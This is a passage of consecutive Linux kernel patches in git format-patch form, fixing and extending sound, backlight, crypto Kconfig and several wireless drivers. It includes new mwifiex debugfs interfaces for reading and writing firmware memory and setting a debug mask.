a/sound/pci/hda/patch_realtek.c +++ b/sound/pci/hda/patch_realtek.c @@ -884,6 +884,7 @@ static struct alc_codec_rename_pci_table rename_pci_tbl[] = { { 0x10ec0275, 0x1028, 0, "ALC3260" }, { 0x10ec0899, 0x1028, 0, "ALC3861" }, { 0x10ec0298, 0x1028, 0, "ALC3266" }, + { 0x10ec0256, 0x1028, 0, "ALC3246" }, { 0x10ec0670, 0x1025, 0, "ALC669X" }, { 0x10ec0676, 0x1025, 0, "ALC679X" }, { 0x10ec0282, 0x1043, 0, "ALC3229" }, From 68feaca0b13e453aa14ee064c1736202b48b342f Mon Sep 17 00:00:00 2001 From: Nicolas Ferre Date: Thu, 19 Feb 2015 10:30:14 +0100 Subject: [PATCH 193/872] backlight: pwm: Handle EPROBE_DEFER while requesting the PWM When trying to request the PWM device with devm_pwm_get(), the EPROBE_DEFER flag is not handled properly. It can lead to the PWM not being found. Signed-off-by: Boris Brezillon Signed-off-by: Nicolas Ferre Acked-by: Thierry Reding Signed-off-by: Lee Jones --- drivers/video/backlight/pwm_bl.c | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/drivers/video/backlight/pwm_bl.c b/drivers/video/backlight/pwm_bl.c index 3a145a643e0d..6897f1c1bc73 100644 --- a/drivers/video/backlight/pwm_bl.c +++ b/drivers/video/backlight/pwm_bl.c @@ -274,6 +274,10 @@ static int pwm_backlight_probe(struct platform_device *pdev) pb->pwm = devm_pwm_get(&pdev->dev, NULL); if (IS_ERR(pb->pwm)) { + ret = PTR_ERR(pb->pwm); + if (ret == -EPROBE_DEFER) + goto err_alloc; + dev_err(&pdev->dev, "unable to request PWM, trying legacy API\n"); pb->legacy = true; pb->pwm = pwm_request(data->pwm_id, "pwm-backlight"); From f858c7bcca8c20761a20593439fe998b4b67e86b Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Tue, 26 May 2015 15:32:42 +0800 Subject: [PATCH 194/872] crypto: algif_aead - Disable AEAD user-space for now The newly added AEAD user-space isn't quite ready for prime time just yet. In particular it is conflicting with the AEAD single SG list interface change so this patch disables it now. Once the SG list stuff is completely done we can then renable this interface. Signed-off-by: Herbert Xu --- crypto/Kconfig | 9 --------- 1 file changed, 9 deletions(-) diff --git a/crypto/Kconfig b/crypto/Kconfig index 8aaf298a80e1..362905e7c841 100644 --- a/crypto/Kconfig +++ b/crypto/Kconfig @@ -1512,15 +1512,6 @@ config CRYPTO_USER_API_RNG This option enables the user-spaces interface for random number generator algorithms. -config CRYPTO_USER_API_AEAD - tristate "User-space interface for AEAD cipher algorithms" - depends on NET - select CRYPTO_AEAD - select CRYPTO_USER_API - help - This option enables the user-spaces interface for AEAD - cipher algorithms. - config CRYPTO_HASH_INFO bool From a706b41b8200584f10f6e4cac30c14c536d1299b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Lauri=20Kentt=C3=A4?= Date: Fri, 8 May 2015 22:01:53 +0300 Subject: [PATCH 195/872] rtlwifi: rtl8188ee: Fix pwrseqcmd.h include path. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: Lauri Kenttä Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.c | 2 +- drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.h | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.c b/drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.c index ef28c8ea1e84..02013df968a0 100644 --- a/drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.c +++ b/drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.c @@ -23,7 +23,7 @@ * *****************************************************************************/ -#include "pwrseqcmd.h" +#include "../pwrseqcmd.h" #include "pwrseq.h" /* drivers should parse below arrays and do the corresponding actions */ diff --git a/drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.h b/drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.h index 79103347d967..f2d9c6116e5c 100644 --- a/drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.h +++ b/drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.h @@ -26,7 +26,7 @@ #ifndef __RTL8723E_PWRSEQ_H__ #define __RTL8723E_PWRSEQ_H__ -#include "pwrseqcmd.h" +#include "../pwrseqcmd.h" /* Check document WM-20110607-Paul-RTL8188EE_Power_Architecture-R02.vsd * There are 6 HW Power States: * 0: POFF--Power Off From dacc7e1939852b7e85f64720bb1cb4563dbd5489 Mon Sep 17 00:00:00 2001 From: Taehee Yoo Date: Sat, 9 May 2015 18:15:23 +0900 Subject: [PATCH 196/872] rtlwifi: rtl8192cu: Remove setting REG_BCN_MAX_ERR code in _rtl92cu_set_media_status(). Initialization routine set REG_BCN_MAX_ERR to 0xFF. also _rtl92cu_set_media_status set REG_BCN_MAX_ERR to same value. so i remove this code. Signed-off-by: Taehee Yoo Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/rtl8192cu/hw.c | 1 - 1 file changed, 1 deletion(-) diff --git a/drivers/net/wireless/rtlwifi/rtl8192cu/hw.c b/drivers/net/wireless/rtlwifi/rtl8192cu/hw.c index d310d55d800e..3c1639ba7f99 100644 --- a/drivers/net/wireless/rtlwifi/rtl8192cu/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8192cu/hw.c @@ -1323,7 +1323,6 @@ static int _rtl92cu_set_media_status(struct ieee80211_hw *hw, enum led_ctl_mode ledaction = LED_CTL_NO_LINK; bt_msr &= 0xfc; - rtl_write_byte(rtlpriv, REG_BCN_MAX_ERR, 0xFF); if (type == NL80211_IFTYPE_UNSPECIFIED || type == NL80211_IFTYPE_STATION) { _rtl92cu_stop_tx_beacon(hw); From bfe3d2bf6c2356fbe6be7c5200053accf35721d4 Mon Sep 17 00:00:00 2001 From: Taehee Yoo Date: Sat, 9 May 2015 18:16:51 +0900 Subject: [PATCH 197/872] rtlwifi: rtl8192cu: Remove rtl92c_init_beacon_max_error's parameter parameter "infra_mode" of rtl92c_init_beacon_max_error() is not used. so i remove this. Signed-off-by: Taehee Yoo Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/rtl8192cu/hw.c | 2 +- drivers/net/wireless/rtlwifi/rtl8192cu/mac.c | 2 +- drivers/net/wireless/rtlwifi/rtl8192cu/mac.h | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/rtl8192cu/hw.c b/drivers/net/wireless/rtlwifi/rtl8192cu/hw.c index 3c1639ba7f99..189859617db8 100644 --- a/drivers/net/wireless/rtlwifi/rtl8192cu/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8192cu/hw.c @@ -889,7 +889,7 @@ static int _rtl92cu_init_mac(struct ieee80211_hw *hw) rtl92c_set_min_space(hw, IS_92C_SERIAL(rtlhal->version)); rtl92c_init_beacon_parameters(hw, rtlhal->version); rtl92c_init_ampdu_aggregation(hw); - rtl92c_init_beacon_max_error(hw, true); + rtl92c_init_beacon_max_error(hw); return err; } diff --git a/drivers/net/wireless/rtlwifi/rtl8192cu/mac.c b/drivers/net/wireless/rtlwifi/rtl8192cu/mac.c index adb810794eef..f3db6bc8596a 100644 --- a/drivers/net/wireless/rtlwifi/rtl8192cu/mac.c +++ b/drivers/net/wireless/rtlwifi/rtl8192cu/mac.c @@ -613,7 +613,7 @@ void rtl92c_init_ampdu_aggregation(struct ieee80211_hw *hw) rtl_write_word(rtlpriv, 0x4CA, 0x0708); } -void rtl92c_init_beacon_max_error(struct ieee80211_hw *hw, bool infra_mode) +void rtl92c_init_beacon_max_error(struct ieee80211_hw *hw) { struct rtl_priv *rtlpriv = rtl_priv(hw); diff --git a/drivers/net/wireless/rtlwifi/rtl8192cu/mac.h b/drivers/net/wireless/rtlwifi/rtl8192cu/mac.h index bf53652e4edd..58548e8f2c41 100644 --- a/drivers/net/wireless/rtlwifi/rtl8192cu/mac.h +++ b/drivers/net/wireless/rtlwifi/rtl8192cu/mac.h @@ -66,7 +66,7 @@ void rtl92c_init_edca_param(struct ieee80211_hw *hw, void rtl92c_init_edca(struct ieee80211_hw *hw); void rtl92c_init_ampdu_aggregation(struct ieee80211_hw *hw); -void rtl92c_init_beacon_max_error(struct ieee80211_hw *hw, bool infra_mode); +void rtl92c_init_beacon_max_error(struct ieee80211_hw *hw); void rtl92c_init_rdg_setting(struct ieee80211_hw *hw); void rtl92c_init_retry_function(struct ieee80211_hw *hw); From f0992ace680c7a1b5b62da2103602bd7e6eb63cd Mon Sep 17 00:00:00 2001 From: "Fu, Zhonghui" Date: Mon, 11 May 2015 10:41:32 +0800 Subject: [PATCH 198/872] brcmfmac: prohibit ACPI power management for brcmfmac driver ACPI will manage WiFi chip's power state during suspend/resume process on some tablet platforms(such as ASUS T100TA). This is not supported by brcmfmac driver now, and the context of WiFi chip will be damaged after resume. This patch informs ACPI not to manage WiFi chip's power state. Signed-off-by: Zhonghui Fu Acked-by: Arend van Spriel Signed-off-by: Kalle Valo --- drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c b/drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c index 8a69544485a9..b0d0ff5d82c0 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c @@ -33,6 +33,7 @@ #include #include #include +#include #include #include @@ -1122,6 +1123,8 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func, int err; struct brcmf_sdio_dev *sdiodev; struct brcmf_bus *bus_if; + struct device *dev; + struct acpi_device *adev; brcmf_dbg(SDIO, "Enter\n"); brcmf_dbg(SDIO, "Class=%x\n", func->class); @@ -1129,6 +1132,12 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func, brcmf_dbg(SDIO, "sdio device ID: 0x%04x\n", func->device); brcmf_dbg(SDIO, "Function#: %d\n", func->num); + /* prohibit ACPI power management for this device */ + dev = &func->dev; + adev = ACPI_COMPANION(dev); + if (adev) + adev->flags.power_manageable = 0; + /* Consume func num 1 but dont do anything with it. */ if (func->num == 1) return 0; From f5c65f38912e38fc035dd1e515c1442bf62a8dab Mon Sep 17 00:00:00 2001 From: Okash Khawaja Date: Mon, 11 May 2015 12:53:25 +0100 Subject: [PATCH 199/872] adm8211: fix checkpatch errors for indentation and new line This patch fixes these checkpatch.pl errors around a single switch-case block: ERROR: switch and case should be at the same indent ERROR: trailing statements should be on next line More specifically, the fix has been applied to the five occurances of the errors listed below. ERROR: switch and case should be at the same indent #1100: FILE: adm8211.c:1100: + switch (cline) { [...] + default: reg |= (0x0 << 14); ERROR: trailing statements should be on next line #1101: FILE: adm8211.c:1101: + case 0x8: reg |= (0x1 << 14); ERROR: trailing statements should be on next line #1103: FILE: adm8211.c:1103: + case 0x16: reg |= (0x2 << 14); ERROR: trailing statements should be on next line #1105: FILE: adm8211.c:1105: + case 0x32: reg |= (0x3 << 14); ERROR: trailing statements should be on next line #1107: FILE: adm8211.c:1107: + default: reg |= (0x0 << 14); Signed-off-by: Okash Khawaja Signed-off-by: Kalle Valo --- drivers/net/wireless/adm8211.c | 20 ++++++++++++-------- 1 file changed, 12 insertions(+), 8 deletions(-) diff --git a/drivers/net/wireless/adm8211.c b/drivers/net/wireless/adm8211.c index 413528295d72..faf277e0a646 100644 --- a/drivers/net/wireless/adm8211.c +++ b/drivers/net/wireless/adm8211.c @@ -1098,14 +1098,18 @@ static void adm8211_hw_init(struct ieee80211_hw *dev) pci_read_config_byte(priv->pdev, PCI_CACHE_LINE_SIZE, &cline); switch (cline) { - case 0x8: reg |= (0x1 << 14); - break; - case 0x16: reg |= (0x2 << 14); - break; - case 0x32: reg |= (0x3 << 14); - break; - default: reg |= (0x0 << 14); - break; + case 0x8: + reg |= (0x1 << 14); + break; + case 0x16: + reg |= (0x2 << 14); + break; + case 0x32: + reg |= (0x3 << 14); + break; + default: + reg |= (0x0 << 14); + break; } } From fe0a483ecf4458e94ebe58d7fedc6d56e21eed56 Mon Sep 17 00:00:00 2001 From: Okash Khawaja Date: Mon, 11 May 2015 12:58:31 +0100 Subject: [PATCH 200/872] adm8211: fixed the possible pci cache line sizes inside switch-case The PCI cache line size value was being compared against decimal values prefixed with 0x. Fixed the literals to use the correct hex values. This has not been tested due to lack of hardware. However, the value in `cline` is PCI cache line size, which is the CPU's cache line size. It is less likely for cache line sizes to be 22 or 50, and more likely for them to be 16 or 32. Also, as far as I understand, cache line size is used for things like aligning DMA requests with CPU cache line, which improve performance but wouldn't break anything if the value doesn't match. In this case, we will fall through to the default case which leaves `reg` unchanged. Signed-off-by: Okash Khawaja Signed-off-by: Kalle Valo --- drivers/net/wireless/adm8211.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/adm8211.c b/drivers/net/wireless/adm8211.c index faf277e0a646..8c283fcd843d 100644 --- a/drivers/net/wireless/adm8211.c +++ b/drivers/net/wireless/adm8211.c @@ -1101,10 +1101,10 @@ static void adm8211_hw_init(struct ieee80211_hw *dev) case 0x8: reg |= (0x1 << 14); break; - case 0x16: + case 0x10: reg |= (0x2 << 14); break; - case 0x32: + case 0x20: reg |= (0x3 << 14); break; default: From 111c61054d86f3c8586146819aa905e14026fc4d Mon Sep 17 00:00:00 2001 From: Daniel Drake Date: Mon, 11 May 2015 14:00:27 -0500 Subject: [PATCH 201/872] rtlwifi: btcoexist: Fix interference between rtl8723be and Bluetooth During usage of the new Bluetooth driver for Realtek devices, it was found that BT scans were inhibited for the RTL8723BE when wireless was active. The exact cause of this interference is not known yet, but a satisfactory work around has been found that does not seem to have any visible side effects. Signed-off-by: Daniel Drake Signed-off-by: Larry Finger Cc: Shao Fu Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/btcoexist/halbtc8723b2ant.c | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/btcoexist/halbtc8723b2ant.c b/drivers/net/wireless/rtlwifi/btcoexist/halbtc8723b2ant.c index cefe26991421..f2b9d11adc9e 100644 --- a/drivers/net/wireless/rtlwifi/btcoexist/halbtc8723b2ant.c +++ b/drivers/net/wireless/rtlwifi/btcoexist/halbtc8723b2ant.c @@ -1286,8 +1286,11 @@ static void btc8723b2ant_ps_tdma(struct btc_coexist *btcoexist, bool force_exec, 0x12, 0xe1, 0x90); break; case 3: - btc8723b2ant_set_fw_ps_tdma(btcoexist, 0xe3, 0x1c, - 0x3, 0xf1, 0x90); + /* This call breaks BT when wireless is active - + * comment it out for now until a better fix is found: + * btc8723b2ant_set_fw_ps_tdma(btcoexist, 0xe3, 0x1c, + * 0x3, 0xf1, 0x90); + */ break; case 4: btc8723b2ant_set_fw_ps_tdma(btcoexist, 0xe3, 0x10, From c2c6c85fca47f4c5ac99d482b64d59dbd142117c Mon Sep 17 00:00:00 2001 From: Chin-ran Lo Date: Tue, 12 May 2015 00:48:17 +0530 Subject: [PATCH 202/872] mwifiex: add support for FW memory read/write operations This patch adds support for FW memory read/write operations via debugfs. This is useful during debugging FW issues. Examples: For reading FW memory location: echo r 0x01ac > /sys/kernel/debug/mwifiex/mlan0/memrw cat /sys/kernel/debug/mwifiex/mlan0/memrw For writing FW memory location: echo w 0x01ac 0x55aa > /sys/kernel/debug/mwifiex/mlan0/memrw Signed-off-by: Chin-ran Lo Signed-off-by: Cathy Luo Signed-off-by: Avinash Patil Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/debugfs.c | 79 ++++++++++++++++++++++ drivers/net/wireless/mwifiex/fw.h | 9 +++ drivers/net/wireless/mwifiex/ioctl.h | 5 ++ drivers/net/wireless/mwifiex/main.h | 1 + drivers/net/wireless/mwifiex/sta_cmd.c | 23 +++++++ drivers/net/wireless/mwifiex/sta_cmdresp.c | 16 +++++ 6 files changed, 133 insertions(+) diff --git a/drivers/net/wireless/mwifiex/debugfs.c b/drivers/net/wireless/mwifiex/debugfs.c index 1fb329dc6744..414ee2da9bfc 100644 --- a/drivers/net/wireless/mwifiex/debugfs.c +++ b/drivers/net/wireless/mwifiex/debugfs.c @@ -535,6 +535,83 @@ mwifiex_regrdwr_read(struct file *file, char __user *ubuf, return ret; } +/* Proc memrw file write handler. + * This function is called when the 'memrw' file is opened for writing + * This function can be used to write to a memory location. + */ +static ssize_t +mwifiex_memrw_write(struct file *file, const char __user *ubuf, size_t count, + loff_t *ppos) +{ + int ret; + char cmd; + struct mwifiex_ds_mem_rw mem_rw; + u16 cmd_action; + struct mwifiex_private *priv = (void *)file->private_data; + unsigned long addr = get_zeroed_page(GFP_KERNEL); + char *buf = (void *)addr; + size_t buf_size = min(count, (size_t)(PAGE_SIZE - 1)); + + if (!buf) + return -ENOMEM; + + if (copy_from_user(buf, ubuf, buf_size)) { + ret = -EFAULT; + goto done; + } + + ret = sscanf(buf, "%c %x %x", &cmd, &mem_rw.addr, &mem_rw.value); + if (ret != 3) { + ret = -EINVAL; + goto done; + } + + if ((cmd == 'r') || (cmd == 'R')) { + cmd_action = HostCmd_ACT_GEN_GET; + mem_rw.value = 0; + } else if ((cmd == 'w') || (cmd == 'W')) { + cmd_action = HostCmd_ACT_GEN_SET; + } else { + ret = -EINVAL; + goto done; + } + + memcpy(&priv->mem_rw, &mem_rw, sizeof(mem_rw)); + if (mwifiex_send_cmd(priv, HostCmd_CMD_MEM_ACCESS, cmd_action, 0, + &mem_rw, true)) + ret = -1; + else + ret = count; + +done: + free_page(addr); + return ret; +} + +/* Proc memrw file read handler. + * This function is called when the 'memrw' file is opened for reading + * This function can be used to read from a memory location. + */ +static ssize_t +mwifiex_memrw_read(struct file *file, char __user *ubuf, + size_t count, loff_t *ppos) +{ + struct mwifiex_private *priv = (void *)file->private_data; + unsigned long addr = get_zeroed_page(GFP_KERNEL); + char *buf = (char *)addr; + int ret, pos = 0; + + if (!buf) + return -ENOMEM; + + pos += snprintf(buf, PAGE_SIZE, "0x%x 0x%x\n", priv->mem_rw.addr, + priv->mem_rw.value); + ret = simple_read_from_buffer(ubuf, count, ppos, buf, pos); + + free_page(addr); + return ret; +} + static u32 saved_offset = -1, saved_bytes = -1; /* @@ -749,6 +826,7 @@ MWIFIEX_DFS_FILE_READ_OPS(getlog); MWIFIEX_DFS_FILE_READ_OPS(fw_dump); MWIFIEX_DFS_FILE_OPS(regrdwr); MWIFIEX_DFS_FILE_OPS(rdeeprom); +MWIFIEX_DFS_FILE_OPS(memrw); MWIFIEX_DFS_FILE_OPS(hscfg); MWIFIEX_DFS_FILE_OPS(histogram); @@ -773,6 +851,7 @@ mwifiex_dev_debugfs_init(struct mwifiex_private *priv) MWIFIEX_DFS_ADD_FILE(regrdwr); MWIFIEX_DFS_ADD_FILE(rdeeprom); MWIFIEX_DFS_ADD_FILE(fw_dump); + MWIFIEX_DFS_ADD_FILE(memrw); MWIFIEX_DFS_ADD_FILE(hscfg); MWIFIEX_DFS_ADD_FILE(histogram); } diff --git a/drivers/net/wireless/mwifiex/fw.h b/drivers/net/wireless/mwifiex/fw.h index 59d8964dd0dc..c404390cb0fa 100644 --- a/drivers/net/wireless/mwifiex/fw.h +++ b/drivers/net/wireless/mwifiex/fw.h @@ -323,6 +323,7 @@ enum MWIFIEX_802_11_PRIVACY_FILTER { #define HostCmd_CMD_802_11_SUBSCRIBE_EVENT 0x0075 #define HostCmd_CMD_802_11_TX_RATE_QUERY 0x007f #define HostCmd_CMD_802_11_IBSS_COALESCING_STATUS 0x0083 +#define HostCmd_CMD_MEM_ACCESS 0x0086 #define HostCmd_CMD_CFG_DATA 0x008f #define HostCmd_CMD_VERSION_EXT 0x0097 #define HostCmd_CMD_MEF_CFG 0x009a @@ -1576,6 +1577,13 @@ struct mwifiex_ie_types_extcap { u8 ext_capab[0]; } __packed; +struct host_cmd_ds_mem_access { + __le16 action; + __le16 reserved; + __le32 addr; + __le32 value; +}; + struct mwifiex_ie_types_qos_info { struct mwifiex_ie_types_header header; u8 qos_info; @@ -1958,6 +1966,7 @@ struct host_cmd_ds_command { struct host_cmd_ds_p2p_mode_cfg mode_cfg; struct host_cmd_ds_802_11_ibss_status ibss_coalescing; struct host_cmd_ds_mef_cfg mef_cfg; + struct host_cmd_ds_mem_access mem; struct host_cmd_ds_mac_reg_access mac_reg; struct host_cmd_ds_bbp_reg_access bbp_reg; struct host_cmd_ds_rf_reg_access rf_reg; diff --git a/drivers/net/wireless/mwifiex/ioctl.h b/drivers/net/wireless/mwifiex/ioctl.h index d2b05c3a96da..224c993e62e9 100644 --- a/drivers/net/wireless/mwifiex/ioctl.h +++ b/drivers/net/wireless/mwifiex/ioctl.h @@ -342,6 +342,11 @@ struct mwifiex_ds_read_eeprom { u8 value[MAX_EEPROM_DATA]; }; +struct mwifiex_ds_mem_rw { + u32 addr; + u32 value; +}; + #define IEEE_MAX_IE_SIZE 256 #define MWIFIEX_IE_HDR_SIZE (sizeof(struct mwifiex_ie) - IEEE_MAX_IE_SIZE) diff --git a/drivers/net/wireless/mwifiex/main.h b/drivers/net/wireless/mwifiex/main.h index fe1256044a6c..b387d5a9f1e6 100644 --- a/drivers/net/wireless/mwifiex/main.h +++ b/drivers/net/wireless/mwifiex/main.h @@ -611,6 +611,7 @@ struct mwifiex_private { struct delayed_work dfs_chan_sw_work; struct cfg80211_beacon_data beacon_after; struct mwifiex_11h_intf_state state_11h; + struct mwifiex_ds_mem_rw mem_rw; }; diff --git a/drivers/net/wireless/mwifiex/sta_cmd.c b/drivers/net/wireless/mwifiex/sta_cmd.c index 49422f2a5380..a76d6a4340d0 100644 --- a/drivers/net/wireless/mwifiex/sta_cmd.c +++ b/drivers/net/wireless/mwifiex/sta_cmd.c @@ -1071,6 +1071,26 @@ static int mwifiex_cmd_ibss_coalescing_status(struct host_cmd_ds_command *cmd, return 0; } +/* This function prepares command buffer to get/set memory location value. + */ +static int +mwifiex_cmd_mem_access(struct host_cmd_ds_command *cmd, u16 cmd_action, + void *pdata_buf) +{ + struct mwifiex_ds_mem_rw *mem_rw = (void *)pdata_buf; + struct host_cmd_ds_mem_access *mem_access = (void *)&cmd->params.mem; + + cmd->command = cpu_to_le16(HostCmd_CMD_MEM_ACCESS); + cmd->size = cpu_to_le16(sizeof(struct host_cmd_ds_mem_access) + + S_DS_GEN); + + mem_access->action = cpu_to_le16(cmd_action); + mem_access->addr = cpu_to_le32(mem_rw->addr); + mem_access->value = cpu_to_le32(mem_rw->value); + + return 0; +} + /* * This function prepares command to set/get register value. * @@ -1885,6 +1905,9 @@ int mwifiex_sta_prepare_cmd(struct mwifiex_private *priv, uint16_t cmd_no, case HostCmd_CMD_802_11_SCAN_EXT: ret = mwifiex_cmd_802_11_scan_ext(priv, cmd_ptr, data_buf); break; + case HostCmd_CMD_MEM_ACCESS: + ret = mwifiex_cmd_mem_access(cmd_ptr, cmd_action, data_buf); + break; case HostCmd_CMD_MAC_REG_ACCESS: case HostCmd_CMD_BBP_REG_ACCESS: case HostCmd_CMD_RF_REG_ACCESS: diff --git a/drivers/net/wireless/mwifiex/sta_cmdresp.c b/drivers/net/wireless/mwifiex/sta_cmdresp.c index 88dc6b672ef4..efe31a2a90c9 100644 --- a/drivers/net/wireless/mwifiex/sta_cmdresp.c +++ b/drivers/net/wireless/mwifiex/sta_cmdresp.c @@ -741,6 +741,19 @@ mwifiex_ret_p2p_mode_cfg(struct mwifiex_private *priv, return 0; } +/* This function handles the command response of mem_access command + */ +static int +mwifiex_ret_mem_access(struct mwifiex_private *priv, + struct host_cmd_ds_command *resp, void *pioctl_buf) +{ + struct host_cmd_ds_mem_access *mem = (void *)&resp->params.mem; + + priv->mem_rw.addr = le32_to_cpu(mem->addr); + priv->mem_rw.value = le32_to_cpu(mem->value); + + return 0; +} /* * This function handles the command response of register access. * @@ -1103,6 +1116,9 @@ int mwifiex_process_sta_cmdresp(struct mwifiex_private *priv, u16 cmdresp_no, case HostCmd_CMD_802_11_IBSS_COALESCING_STATUS: ret = mwifiex_ret_ibss_coalescing_status(priv, resp); break; + case HostCmd_CMD_MEM_ACCESS: + ret = mwifiex_ret_mem_access(priv, resp, data_buf); + break; case HostCmd_CMD_MAC_REG_ACCESS: case HostCmd_CMD_BBP_REG_ACCESS: case HostCmd_CMD_RF_REG_ACCESS: From c687a0077faa0d24fe97a4434974f32bd359beb7 Mon Sep 17 00:00:00 2001 From: Zhaoyang Liu Date: Tue, 12 May 2015 00:48:18 +0530 Subject: [PATCH 203/872] mwifiex: add prints debug ctrl support This patch adds support for debugging print control in mwifiex driver. The debug level can be controlled via either by modules load parameter debug_mask or by writing to debug_mask in debugfs file. Signed-off-by: Zhaoyang Liu Signed-off-by: Cathy Luo Signed-off-by: Avinash Patil Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/debugfs.c | 63 ++++++++++++++++++++++++++ drivers/net/wireless/mwifiex/ioctl.h | 1 + drivers/net/wireless/mwifiex/main.c | 5 ++ drivers/net/wireless/mwifiex/main.h | 40 ++++++++++++++++ drivers/net/wireless/mwifiex/util.c | 3 ++ 5 files changed, 112 insertions(+) diff --git a/drivers/net/wireless/mwifiex/debugfs.c b/drivers/net/wireless/mwifiex/debugfs.c index 414ee2da9bfc..f3e19e917949 100644 --- a/drivers/net/wireless/mwifiex/debugfs.c +++ b/drivers/net/wireless/mwifiex/debugfs.c @@ -535,6 +535,67 @@ mwifiex_regrdwr_read(struct file *file, char __user *ubuf, return ret; } +/* Proc debug_mask file read handler. + * This function is called when the 'debug_mask' file is opened for reading + * This function can be used read driver debugging mask value. + */ +static ssize_t +mwifiex_debug_mask_read(struct file *file, char __user *ubuf, + size_t count, loff_t *ppos) +{ + struct mwifiex_private *priv = + (struct mwifiex_private *)file->private_data; + unsigned long page = get_zeroed_page(GFP_KERNEL); + char *buf = (char *)page; + size_t ret = 0; + int pos = 0; + + if (!buf) + return -ENOMEM; + + pos += snprintf(buf, PAGE_SIZE, "debug mask=0x%08x\n", + priv->adapter->debug_mask); + ret = simple_read_from_buffer(ubuf, count, ppos, buf, pos); + + free_page(page); + return ret; +} + +/* Proc debug_mask file read handler. + * This function is called when the 'debug_mask' file is opened for reading + * This function can be used read driver debugging mask value. + */ +static ssize_t +mwifiex_debug_mask_write(struct file *file, const char __user *ubuf, + size_t count, loff_t *ppos) +{ + int ret; + unsigned long debug_mask; + struct mwifiex_private *priv = (void *)file->private_data; + unsigned long addr = get_zeroed_page(GFP_KERNEL); + char *buf = (void *)addr; + size_t buf_size = min(count, (size_t)(PAGE_SIZE - 1)); + + if (!buf) + return -ENOMEM; + + if (copy_from_user(buf, ubuf, buf_size)) { + ret = -EFAULT; + goto done; + } + + if (kstrtoul(buf, 0, &debug_mask)) { + ret = -EINVAL; + goto done; + } + + priv->adapter->debug_mask = debug_mask; + ret = count; +done: + free_page(addr); + return ret; +} + /* Proc memrw file write handler. * This function is called when the 'memrw' file is opened for writing * This function can be used to write to a memory location. @@ -829,6 +890,7 @@ MWIFIEX_DFS_FILE_OPS(rdeeprom); MWIFIEX_DFS_FILE_OPS(memrw); MWIFIEX_DFS_FILE_OPS(hscfg); MWIFIEX_DFS_FILE_OPS(histogram); +MWIFIEX_DFS_FILE_OPS(debug_mask); /* * This function creates the debug FS directory structure and the files. @@ -854,6 +916,7 @@ mwifiex_dev_debugfs_init(struct mwifiex_private *priv) MWIFIEX_DFS_ADD_FILE(memrw); MWIFIEX_DFS_ADD_FILE(hscfg); MWIFIEX_DFS_ADD_FILE(histogram); + MWIFIEX_DFS_ADD_FILE(debug_mask); } /* diff --git a/drivers/net/wireless/mwifiex/ioctl.h b/drivers/net/wireless/mwifiex/ioctl.h index 224c993e62e9..6f11a25a6b49 100644 --- a/drivers/net/wireless/mwifiex/ioctl.h +++ b/drivers/net/wireless/mwifiex/ioctl.h @@ -189,6 +189,7 @@ struct tdls_peer_info { }; struct mwifiex_debug_info { + unsigned int debug_mask; u32 int_counter; u32 packets_out[MAX_NUM_TID]; u32 tx_buf_size; diff --git a/drivers/net/wireless/mwifiex/main.c b/drivers/net/wireless/mwifiex/main.c index 213aa986e87a..eca4378eddda 100644 --- a/drivers/net/wireless/mwifiex/main.c +++ b/drivers/net/wireless/mwifiex/main.c @@ -24,6 +24,10 @@ #define VERSION "1.0" +static unsigned int debug_mask = MWIFIEX_DEFAULT_DEBUG_MASK; +module_param(debug_mask, uint, 0); +MODULE_PARM_DESC(debug_mask, "bitmap for debug flags"); + const char driver_version[] = "mwifiex " VERSION " (%s) "; static char *cal_data_cfg; module_param(cal_data_cfg, charp, 0); @@ -63,6 +67,7 @@ static int mwifiex_register(void *card, struct mwifiex_if_ops *if_ops, /* Save interface specific operations in adapter */ memmove(&adapter->if_ops, if_ops, sizeof(struct mwifiex_if_ops)); + adapter->debug_mask = debug_mask; /* card specific initialization has been deferred until now .. */ if (adapter->if_ops.init_if) diff --git a/drivers/net/wireless/mwifiex/main.h b/drivers/net/wireless/mwifiex/main.h index b387d5a9f1e6..6cbbc50126ac 100644 --- a/drivers/net/wireless/mwifiex/main.h +++ b/drivers/net/wireless/mwifiex/main.h @@ -147,6 +147,45 @@ enum { /* Address alignment */ #define MWIFIEX_ALIGN_ADDR(p, a) (((long)(p) + (a) - 1) & ~((a) - 1)) +/** + *enum mwifiex_debug_level - marvell wifi debug level + */ +enum MWIFIEX_DEBUG_LEVEL { + MWIFIEX_DBG_MSG = 0x00000001, + MWIFIEX_DBG_FATAL = 0x00000002, + MWIFIEX_DBG_ERROR = 0x00000004, + MWIFIEX_DBG_DATA = 0x00000008, 